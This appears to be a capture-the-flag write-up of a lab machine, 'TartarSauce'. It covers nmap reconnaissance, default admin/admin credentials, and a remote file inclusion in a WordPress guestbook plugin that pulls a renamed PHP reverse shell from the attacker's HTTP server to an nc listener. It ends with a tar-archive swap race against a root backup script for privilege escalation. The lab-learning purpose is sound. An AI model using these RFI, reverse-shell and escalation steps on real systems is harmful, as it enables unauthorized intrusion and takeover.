Vulnerability Explanation: The machine is vulnerable to RFI on WordPress plug inwhich can be exploited by non-authenticated attacker to include remote PHP file and execute arbitrary code on the vulnerable system.
Privilege Escalation Vulnerability: Misconfiguration of permission
Vulnerability Fix: Apply patch and restrict permission
Severity: High
Step to Compromise the Host:
Reconnaissance
└─$ nmap -p- -sC -sV -T4 10.10.10.88
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-11 09:46 EST
Nmap scan report for 10.10.10.88
Host is up (0.047s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page
Enumeration
Port 80 Apache httpd 2.4.18
There's only port 80 open on the machine. Let check it out. It just a simple webpage.
Let go through /robots.txt to check if there is other directory we can access.
Out of that 5 disallow, we can access to /webservices/monstra-3.0.4/ which display a webpage.
I just click all the button available on the application to see how the application work. We just see one more login page of Monstra version 3.0.4.
I have tried login with credential admin/admin and it's worked.
Let search for public exploit in case this version of the application is vulnerable.
Checking the script of exploit Remote File Inclusion.
Advisory Details:
High-Tech Bridge Security Research Lab discovered a critical Remote File Inclusion (RFI) in Gwolle Guestbook WordPress plugin, which can be exploited by non-authenticated attacker to include remote PHP file and execute arbitrary code on the vulnerable system.
HTTP GET parameter "abspath" is not being properly sanitized before being used in PHP require() function. A remote attacker can include a file named 'wp-load.php' from arbitrary remote server and execute its content on the vulnerable web server. In order to do so the attacker needs to place a malicious 'wp-load.php' file into his server document root and includes server's URL into request:
http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]
Modify php-reverse-shell code with our IP, Port and rename file to wp-load.php. Then, start HTTP server to share the file.
python -m SimpleHTTPServer 80
Also start netcat listener on port 4444.
nc -lvp 4444
Let browse with the path that vulnerable to RFI and point to our kali machine.
onuma@TartarSauce:/usr/sbin$ cat backuperer
#!/bin/bash
#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------
# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check
# formatting
printbdr()
{
for n in $(seq 72);
do /usr/bin/printf $"-";
done
}
bdr=$(printbdr)
# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg
# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check
# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &
# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30
# Test the backup integrity
integrity_chk()
{
/usr/bin/diff -r $basedir $check$basedir
}
/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
# Report errors so the dev can investigate the issue.
/usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
integrity_chk >> $errormsg
exit 2
else
# Clean up and save archive to the bkpdir.
/bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
/bin/rm -rf $check .*
exit 0
fi
Let wait for 5mns and check the folder we found other file.
onuma@TartarSauce:/var/tmp$ systemctl list-timers
WARNING: terminal is not fully functional
NEXT LEFT LAST PASSED UNIT
Sun 2021-11-14 01:00:43 EST 4min 9s left Sun 2021-11-14 00:55:43 EST 50s ago backupere
Sun 2021-11-14 06:43:27 EST 5h 46min left Sat 2021-11-13 21:29:01 EST 3h 27min ago apt-daily
Sun 2021-11-14 15:41:53 EST 14h left Sat 2021-11-13 21:29:01 EST 3h 27min ago apt-daily
Sun 2021-11-14 21:44:05 EST 20h left Sat 2021-11-13 21:44:05 EST 3h 12min ago systemd-t
onuma@TartarSauce:/var/tmp$ ls -la
total 48
drwxrwxrwt 10 root root 4096 Nov 14 00:56 .
drwxr-xr-x 14 root root 4096 Feb 9 2018 ..
-rw-r--r-- 1 onuma onuma 2649 Nov 14 00:56 .67ea8f0ff41222a4114795e2bf4fcadf4b103557
-rw-r--r-- 1 onuma onuma 2649 Nov 14 00:45 exploit.tar.gz
drwx------ 3 root root 4096 Feb 17 2018 systemd-private-46248d8045bf434cba7dc7496b9776d4-systemd-timesyncd.service-en3PkS
drwx------ 3 root root 4096 May 29 2020 systemd-private-4e3fb5c5d5a044118936f5728368dfc7-systemd-timesyncd.service-SksmwR
drwx------ 3 root root 4096 Feb 17 2018 systemd-private-7bbf46014a364159a9c6b4b5d58af33b-systemd-timesyncd.service-UnGYDQ
drwx------ 3 root root 4096 Feb 15 2018 systemd-private-9214912da64b4f9cb0a1a78abd4b4412-systemd-timesyncd.service-bUTA2R
drwx------ 3 root root 4096 Nov 13 21:29 systemd-private-95ccd26449184dbc83964cfdc326334d-systemd-timesyncd.service-IRbjIi
drwx------ 3 root root 4096 Feb 15 2018 systemd-private-a3f6b992cd2d42b6aba8bc011dd4aa03-systemd-timesyncd.service-3oO5Td
drwx------ 3 root root 4096 Feb 15 2018 systemd-private-c11c7cccc82046a08ad1732e15efe497-systemd-timesyncd.service-QYRKER
drwx------ 3 root root 4096 Sep 25 2020 systemd-private-e11430f63fc04ed6bd67ec90687cb00e-systemd-timesyncd.service-PYhxgX
Then copy the exploit.tar.gz to .67ea8f0ff41222a4114795e2bf4fcadf4b103557 and wait for 5mns.
